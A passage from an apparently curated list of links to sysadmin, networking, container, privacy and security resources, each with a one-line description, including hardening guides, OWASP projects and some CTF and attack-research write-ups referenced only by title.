&nbsp;&nbsp;:small_orange_diamond: <a href="https://search.disconnect.me/"><b>Disconnect</b></a> - the search engine that anonymizes your searches.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://metager.org/"><b>MetaGer</b></a> - the search engine that uses anonymous proxy and hidden Tor branches.<br> </p> ##### :black_small_square: Secure Webmail Providers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://countermail.com/"><b>CounterMail</b></a> - online email service, designed to provide maximum security and privacy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://mail2tor.com/"><b>Mail2Tor</b></a> - is a Tor Hidden Service that allows anyone to send and receive emails anonymously.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tutanota.com/"><b>Tutanota</b></a> - is the world's most secure email service and amazingly easy to use.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://protonmail.com/"><b>Protonmail</b></a> - is the world's largest secure email service, developed by CERN and MIT scientists.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.startmail.com/en/"><b>Startmail</b></a> - private & encrypted email made easy.<br> </p> ##### :black_small_square: Crypto <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://keybase.io/"><b>Keybase</b></a> - it's open source and powered by public-key cryptography.<br> </p> ##### :black_small_square: PGP Keyservers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://keyserver.ubuntu.com/"><b>SKS OpenPGP Key server</b></a> - services for the SKS keyservers used by OpenPGP.<br> </p> #### Systems/Services &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Operating Systems <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.slackware.com/"><b>Slackware</b></a> - the most "Unix-like" Linux distribution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openbsd.org/"><b>OpenBSD</b></a> - multi-platform 4.4BSD-based UNIX-like operating system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hardenedbsd.org/"><b>HardenedBSD</b></a> - HardenedBSD aims to implement innovative exploit mitigation and security solutions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.kali.org/"><b>Kali Linux</b></a> - Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.parrotsec.org/"><b>Parrot Security OS</b></a> - cyber security GNU/Linux environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.backbox.org/"><b>Backbox Linux</b></a> - penetration test and security assessment oriented Ubuntu-based Linux distribution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blackarch.org/"><b>BlackArch</b></a> - is an Arch Linux-based penetration testing distribution for penetration testers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.pentoo.ch/"><b>Pentoo</b></a> - is a security-focused livecd based on Gentoo.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securityonion.net/"><b>Security Onion</b></a> - Linux distro for intrusion detection, enterprise security monitoring, and log management.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tails.boum.org/"><b>Tails</b></a> - is a live system that aims to preserve your privacy and anonymity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vedetta-com/vedetta"><b>vedetta</b></a> - OpenBSD router boilerplate.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.qubes-os.org"><b>Qubes OS</b></a> - is a security-oriented OS that uses Xen-based virtualization.<br> </p> ##### :black_small_square: HTTP(s) Services <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://varnish-cache.org/"><b>Varnish Cache</b></a> - HTTP accelerator designed for content-heavy dynamic web sites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nginx.org/"><b>Nginx</b></a> - open source web and reverse proxy server that is similar to Apache, but very light weight.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://openresty.org/en/"><b>OpenResty</b></a> - is a dynamic web platform based on NGINX and LuaJIT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/alibaba/tengine"><b>Tengine</b></a> - a distribution of Nginx with some advanced features.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://caddyserver.com/"><b>Caddy Server</b></a> - is an open source, HTTP/2-enabled web server with HTTPS by default.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.haproxy.org/"><b>HAProxy</b></a> - the reliable, high performance TCP/HTTP load balancer.<br> </p> ##### :black_small_square: DNS Services <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nlnetlabs.nl/projects/unbound/about/"><b>Unbound</b></a> - validating, recursive, and caching DNS resolver (with TLS).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.knot-resolver.cz/"><b>Knot Resolver</b></a> - caching full resolver implementation, including both a resolver library and a daemon.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.powerdns.com/"><b>PowerDNS</b></a> - is an open source authoritative DNS server, written in C++ and licensed under the GPL.<br> </p> ##### :black_small_square: Other Services <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/z3APA3A/3proxy"><b>3proxy</b></a> - tiny free proxy server.<br> </p> ##### :black_small_square: Security/hardening <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/EmeraldOnion"><b>Emerald Onion</b></a> - is a 501(c)(3) nonprofit organization and transit internet service provider (ISP) based in Seattle.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/pi-hole/pi-hole"><b>pi-hole</b></a> - the Pi-hole® is a DNS sinkhole that protects your devices from unwanted content.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/stamparm/maltrail"><b>maltrail</b></a> - malicious traffic detection system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Netflix/security_monkey"><b>security_monkey</b></a> - monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/firecracker-microvm/firecracker"><b>firecracker</b></a> - secure and fast microVMs for serverless computing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/StreisandEffect/streisand"><b>streisand</b></a> - sets up a new server running your choice of WireGuard, OpenSSH, OpenVPN, and more.<br> </p> #### Networks &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.capanalysis.net/ca/"><b>CapAnalysis</b></a> - web visual tool to analyze large amounts of captured network traffic (PCAP analyzer).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/digitalocean/netbox"><b>netbox</b></a> - IP address management (IPAM) and data center infrastructure management (DCIM) tool.<br> </p> ##### :black_small_square: Labs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://labs.networkreliability.engineering/"><b>NRE Labs</b></a> - learn automation by doing it. Right now, right here, in your browser.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ee.lbl.gov/"><b>LBNL's Network Research Group</b></a> - home page of the Network Research Group (NRG).<br> </p> #### Containers/Orchestration &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: CLI Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/gvisor"><b>gvisor</b></a> - container runtime sandbox.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bcicen/ctop"><b>ctop</b></a> - top-like interface for container metrics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/docker/docker-bench-security"><b>docker-bench-security</b></a> - is a script that checks for dozens of common best-practices around deploying Docker.<br> </p> ##### :black_small_square: Web Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/moby/moby"><b>Moby</b></a> - a collaborative project for the container ecosystem to assemble container-based system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://traefik.io/"><b>Traefik</b></a> - open source reverse proxy/load balancer provides easier integration with Docker and Let's encrypt.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Kong/kong"><b>kong</b></a> - The Cloud-Native API Gateway.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rancher/rancher"><b>rancher</b></a> - complete container management platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/portainer/portainer"><b>portainer</b></a> - making Docker management easy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jwilder/nginx-proxy"><b>nginx-proxy</b></a> - automated nginx proxy for Docker containers using docker-gen.<br> </p> ##### :black_small_square: Manuals/Tutorials/Best Practices <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/wsargent/docker-cheat-sheet"><b>docker-cheat-sheet</b></a> - a quick reference cheat sheet on Docker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/veggiemonk/awesome-docker"><b>awesome-docker</b></a> - a curated list of Docker resources and projects.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/yeasy/docker_practice"><b>docker_practice</b></a> - learn and understand Docker technologies, with real DevOps practice!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/docker/labs"><b>labs </b></a> - is a collection of tutorials for learning how to use Docker with various tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jessfraz/dockerfiles"><b>dockerfiles</b></a> - various Dockerfiles I use on the desktop and on servers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kelseyhightower/kubernetes-the-hard-way"><b>kubernetes-the-hard-way</b></a> - bootstrap Kubernetes the hard way on Google Cloud Platform. No scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jamesward/kubernetes-the-easy-way"><b>kubernetes-the-easy-way</b></a> - bootstrap Kubernetes the easy way on Google Cloud Platform. No scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dennyzhang/cheatsheet-kubernetes-A4"><b>cheatsheet-kubernetes-A4</b></a> - Kubernetes CheatSheets in A4.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kabachook/k8s-security"><b>k8s-security</b></a> - kubernetes security notes and best practices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://learnk8s.io/production-best-practices/"><b>kubernetes-production-best-practices</b></a> - checklists with best-practices for production-ready Kubernetes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/freach/kubernetes-security-best-practice"><b>kubernetes-production-best-practices</b></a> - kubernetes security - best practice guide.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hjacobs/kubernetes-failure-stories"><b>kubernetes-failure-stories</b></a> - is a compilation of public failure/horror stories related to Kubernetes.<br> </p> #### Manuals/Howtos/Tutorials &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Shell/Command line <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dylanaraps/pure-bash-bible"><b>pure-bash-bible</b></a> - is a collection of pure bash alternatives to external processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dylanaraps/pure-sh-bible"><b>pure-sh-bible</b></a> - is a collection of pure POSIX sh alternatives to external processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Idnan/bash-guide"><b>bash-guide</b></a> - is a guide to learn bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/denysdovhan/bash-handbook"><b>bash-handbook</b></a> - for those who wanna learn Bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.bash-hackers.org/start"><b>The Bash Hackers Wiki</b></a> - hold documentation of any kind about GNU Bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html"><b>Shell & Utilities</b></a> - describes the commands offered to application programs by POSIX-conformant systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jlevy/the-art-of-command-line"><b>the-art-of-command-line</b></a> - master the command line, in one page.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://google.github.io/styleguide/shellguide.html"><b>Shell Style Guide</b></a> - a shell style guide for Google-originated open-source projects.<br> </p> ##### :black_small_square: Text Editors <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://vim.rtorr.com/"><b>Vim Cheat Sheet</b></a> - great multi language vim guide.<br> </p> ##### :black_small_square: Python <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://awesome-python.com/"><b>Awesome Python</b></a> - a curated list of awesome Python frameworks, libraries, software and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gto76/python-cheatsheet"><b>python-cheatsheet</b></a> - comprehensive Python cheatsheet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.pythoncheatsheet.org/"><b>pythoncheatsheet.org</b></a> - basic reference for beginner and advanced developers.<br> </p> ##### :black_small_square: Sed & Awk & Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://posts.specterops.io/fawk-yeah-advanced-sed-and-awk-usage-parsing-for-pentesters-3-e5727e11a8ad?gi=c8f9506b26b6"><b>F’Awk Yeah!</b></a> - advanced sed and awk usage (Parsing for Pentesters 3).<br> </p> ##### :black_small_square: \*nix & Network <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cyberciti.biz/"><b>nixCraft</b></a> - linux and unix tutorials for new and seasoned sysadmin.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tecmint.com/"><b>TecMint</b></a> - the ideal Linux blog for Sysadmins & Geeks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.omnisecu.com/index.php"><b>Omnisecu</b></a> - free Networking, System Administration and Security tutorials.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/cirosantilli/linux-cheat"><b>linux-cheat</b></a> - Linux tutorials and cheatsheets. Minimal examples. Mostly user-land CLI utilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/snori74/linuxupskillchallenge"><b>linuxupskillchallenge</b></a> - learn the skills required to sysadmin.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://cb.vu/unixtoolbox.xhtml"><b>Unix Toolbox</b></a> - Unix/Linux/BSD commands and tasks which are useful for IT work or for advanced users.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linux-kernel-labs.github.io/refs/heads/master/index.html"><b>Linux Kernel Teaching</b></a> - is a collection of lectures and labs Linux kernel topics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://peteris.rocks/blog/htop/"><b>htop explained</b></a> - explanation of everything you can see in htop/top on Linux.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linuxguideandhints.com/"><b>Linux Guide and Hints</b></a> - tutorials on system administration in Fedora and CentOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/NanXiao/strace-little-book"><b>strace-little-book</b></a> - a little book which introduces strace.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/goldshtn/linux-tracing-workshop"><b>linux-tracing-workshop</b></a> - examples and hands-on labs for Linux tracing tools workshops.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bagder/http2-explained"><b>http2-explained</b></a> - a detailed document explaining and documenting HTTP/2.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bagder/http3-explained"><b>http3-explained</b></a> - a document describing the HTTP/3 and QUIC protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.manning.com/books/http2-in-action"><b>HTTP/2 in Action</b></a> - an excellent introduction to the new HTTP/2 standard.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/"><b>Let's code a TCP/IP stack</b></a> - great stuff to learn network and system programming at a deeper level.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/nginx-admins-handbook"><b>Nginx Admin's Handbook</b></a> - describes how to improve NGINX performance, security and other important things.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/digitalocean/nginxconfig.io"><b>nginxconfig.io</b></a> - NGINX config generator on steroids.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://infosec.mozilla.org/guidelines/openssh"><b>openssh guideline</b></a> - is to help operational teams with the configuration of OpenSSH server and client.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gravitational.com/blog/ssh-handshake-explained/"><b>SSH Handshake Explained</b></a> - is a relatively brief description of the SSH handshake.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://kb.isc.org/docs/using-this-knowledgebase"><b>ISC's Knowledgebase</b></a> - you'll find some general information about BIND 9, ISC DHCP, and Kea DHCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://packetlife.net/"><b>PacketLife.net</b></a> - a place to record notes while studying for Cisco's CCNP certification.<br> </p> ##### :black_small_square: Microsoft <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/infosecn1nja/AD-Attack-Defense"><b>AD-Attack-Defense</b></a> - attack and defend active directory using modern post exploitation activity.<br> </p> ##### :black_small_square: Large-scale systems <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/donnemartin/system-design-primer"><b>The System Design Primer</b></a> - learn how to design large-scale systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/binhnguyennus/awesome-scalability"><b>Awesome Scalability</b></a> - best practices in building High Scalability, High Availability, High Stability, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://engineering.videoblocks.com/web-architecture-101-a3224e126947?gi=a896808d22a"><b>Web Architecture 101</b></a> - the basic architecture concepts.<br> </p> ##### :black_small_square: System hardening <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cisecurity.org/cis-benchmarks/"><b>CIS Benchmarks</b></a> - secure configuration settings for over 100 technologies, available as a free PDF.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://highon.coffee/blog/security-harden-centos-7/"><b>Security Harden CentOS 7</b></a> - this walks you through the steps required to security harden CentOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.lisenet.com/2017/centos-7-server-hardening-guide/"><b>CentOS 7 Server Hardening Guide</b></a> - great guide for hardening CentOS; familiar with OpenSCAP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/decalage2/awesome-security-hardening"><b>awesome-security-hardening</b></a> - is a collection of security hardening guides, tools and other resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/the-practical-linux-hardening-guide"><b>The Practical Linux Hardening Guide</b></a> - provides a high-level overview of hardening GNU/Linux systems.<br> </p> ##### :black_small_square: Security & Privacy <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackingarticles.in/"><b>Hacking Articles</b></a> - LRaj Chandel's Security & Hacking Blog.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/toniblyx/my-arsenal-of-aws-security-tools"><b>AWS security tools</b></a> - make your AWS cloud environment more secure.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://inventory.rawsec.ml/index.html"><b>Rawsec's CyberSecurity Inventory</b></a> - an inventory of tools and resources about CyberSecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tls.ulfheim.net/"><b>The Illustrated TLS Connection</b></a> - every byte of a TLS connection explained and reproduced.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices"><b>SSL Research</b></a> - SSL and TLS Deployment Best Practices by SSL Labs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://selinuxgame.org/index.html"><b>SELinux Game</b></a> - learn SELinux by doing. Solve Puzzles, show skillz.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://smallstep.com/blog/everything-pki.html"><b>Certificates and PKI</b></a> - everything you should know about certificates and PKI but are too afraid to ask.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://appsecco.com/books/subdomain-enumeration/"><b>The Art of Subdomain Enumeration</b></a> - a reference for subdomain enumeration techniques.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lifehacker.com/the-comprehensive-guide-to-quitting-google-1830001964"><b>Quitting Google</b></a> - the comprehensive guide to quitting Google.<br> </p> ##### :black_small_square: Web Apps <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/Main_Page"><b>OWASP</b></a> - worldwide not-for-profit charitable organization focused on improving the security of software.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project"><b>OWASP ASVS 3.0.1</b></a> - OWASP Application Security Verification Standard Project.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Santandersecurityresearch/asvs"><b>OWASP ASVS 3.0.1 Web App</b></a> - simple web app that helps developers understand the ASVS requirements.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/ASVS/tree/master/4.0"><b>OWASP ASVS 4.0</b></a> - is a list of application security requirements or tests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Testing_Project"><b>OWASP Testing Guide v4</b></a> - includes a "best practice" penetration testing framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/DevGuide"><b>OWASP Dev Guide</b></a> - this is the development version of the OWASP Developer Guide.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/wstg"><b>OWASP WSTG</b></a> - is a comprehensive open source guide to testing the security of web apps.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_API_Security_Project"><b>OWASP API Security Project</b></a> - focuses specifically on the top ten vulnerabilities in API security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://infosec.mozilla.org/guidelines/web_security.html"><b>Mozilla Web Security</b></a> - help operational teams with creating secure web applications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Netflix/security-bulletins"><b>security-bulletins</b></a> - security bulletins that relate to Netflix Open Source.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/shieldfy/API-Security-Checklist"><b>API-Security-Checklist</b></a> - security countermeasures when designing, testing, and releasing your API.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://enable-cors.org/index.html"><b>Enable CORS</b></a> - enable cross-origin resource sharing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://appsecwiki.com/#/"><b>Application Security Wiki</b></a> - is an initiative to provide all application security related resources at one place.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GrrrDog/weird_proxies/wiki"><b>Weird Proxies</b></a> - reverse proxy related attacks; it is a result of analysis of various proxies.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dfir.it/blog/2015/08/12/webshell-every-time-the-same-purpose/"><b>Webshells</b></a> - great series about malicious payloads.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/blog/practical-web-cache-poisoning"><b>Practical Web Cache Poisoning</b></a> - show you how to compromise websites by using esoteric web features.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bl4de/research/tree/master/hidden_directories_leaks"><b>Hidden directories and files</b></a> - as a source of sensitive information about web application.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bo0om.ru/en/"><b>Explosive blog</b></a> - great blog about cybersec and pentests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.netsparker.com/security-cookies-whitepaper/"><b>Security Cookies</b></a> - this paper will take a close look at cookie security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GitGuardian/APISecurityBestPractices"><b>APISecurityBestPractices</b></a> - help you keep secrets (API keys, db credentials, certificates) out of source code.<br> </p> ##### :black_small_square: All-in-one <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lzone.de/cheat-sheet/"><b>LZone Cheat Sheets</b></a> - all cheat sheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rstacruz/cheatsheets"><b>Dan’s Cheat Sheets’s</b></a> - massive cheat sheets documentation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://devhints.io/"><b>Rico's cheatsheets</b></a> - this is a modest collection of cheatsheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://devdocs.io/"><b>DevDocs API</b></a> - combines multiple API documentations in a fast, organized, and searchable interface.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cheat.sh/"><b>cheat.sh</b></a> - the only cheat sheet you need.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gnulinux.guru/"><b>gnulinux.guru</b></a> - collection of cheat sheets about bash, vim and networking.<br> </p> ##### :black_small_square: Ebooks <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/EbookFoundation/free-programming-books"><b>free-programming-books</b></a> - list of free learning resources in many languages.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bitvijays.github.io/LFC-VulnerableMachines.html"><b>CTF Series : Vulnerable Machines</b></a> - the steps below could be followed to find vulnerabilities and exploits.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/manoelt/50M_CTF_Writeup"><b>50M_CTF_Writeup</b></a> - $50 million CTF from Hackerone - writeup.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/j00ru/ctf-tasks"><b>ctf-tasks</b></a> - an archive of low-level CTF challenges developed over the years.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hshrzd.wordpress.com/how-to-start/"><b>How to start RE/malware analysis?</b></a> - collection of some hints and useful links for the beginners.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.kegel.com/c10k.html"><b>The C10K problem</b></a> - it's time for web servers to handle ten thousand clients simultaneously, don't you think?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.benjojo.co.uk/post/why-is-ethernet-mtu-1500"><b>How 1500 bytes became the MTU of the internet</b></a> - great story about the Maximum Transmission Unit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://poormansprofiler.org/"><b>poor man's profiler</b></a> - like dtrace's don't really provide methods to see what programs are blocking on.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nickcraver.com/blog/2017/05/22/https-on-stack-overflow/"><b>HTTPS on Stack Overflow</b></a> - this is the story of a long journey regarding the implementation of SSL.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://drawings.jvns.ca/"><b>Julia's Drawings</b></a> - some drawings about programming and unix world, zines about systems & debugging tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/corkami/collisions"><b>Hash collisions</b></a> - this great repository is focused on hash collisions exploitation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/in3rsha/sha256-animation"><b>sha256-animation</b></a> - animation of the SHA-256 hash function in your terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://labs.ripe.net/Members/cteusche/bgp-meets-cat"><b>BGP Meets Cat</b></a> - after 3072 hours of manipulating BGP, Job Snijders has succeeded in drawing a Nyancat.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/benjojo/bgp-battleships"><b>bgp-battleships</b></a> - playing battleships over BGP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/alex/what-happens-when"><b>What happens when...</b></a> - you type google.com into your browser and press enter?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vasanthk/how-web-works"><b>how-web-works</b></a> - based on the 'What happens when...' repository.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://robertheaton.com/2018/11/28/https-in-the-real-world/"><b>HTTPS in the real world</b></a> - great tutorial explain how HTTPS works in the real world.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://about.gitlab.com/2018/11/14/how-we-spent-two-weeks-hunting-an-nfs-bug/"><b>Gitlab and NFS bug</b></a> - how we spent two weeks hunting an NFS bug in the Linux kernel.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://about.gitlab.com/2017/02/10/postmortem-of-database-outage-of-january-31/"><b>Gitlab melts down</b></a> - postmortem on the database outage of January 31 2017 with the lessons we learned.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.catb.org/esr/faqs/hacker-howto.html"><b>How To Become A Hacker</b></a> - if you want to be a hacker, keep reading.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ithare.com/infographics-operation-costs-in-cpu-clock-cycles/"><b>Operation Costs in CPU</b></a> - should help to estimate costs of certain operations in CPU clocks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cstack.github.io/db_tutorial/"><b>Let's Build a Simple Database</b></a> - writing a sqlite clone from scratch in C.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://djhworld.github.io/post/2019/05/21/i-dont-know-how-cpus-work-so-i-simulated-one-in-code/"><b>simple-computer</b></a> - great resource to understand how computers work under the hood.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.troyhunt.com/working-with-154-million-records-on/"><b>The story of "Have I been pwned?"</b></a> - working with 154 million records on Azure Table Storage.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.top500.org/"><b>TOP500 Supercomputers</b></a> - shows the 500 most powerful commercially available computer systems known to us.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.shellntel.com/blog/2017/2/8/how-to-build-a-8-gpu-password-cracker"><b>How to build a 8 GPU password cracker</b></a> - any "black magic" or hours of frustration like desktop components do.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://home.cern/science/computing"><b>CERN Data Centre</b></a> - 3D visualizations of the CERN computing environments (and more).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://howfuckedismydatabase.com/"><b>How fucked is my 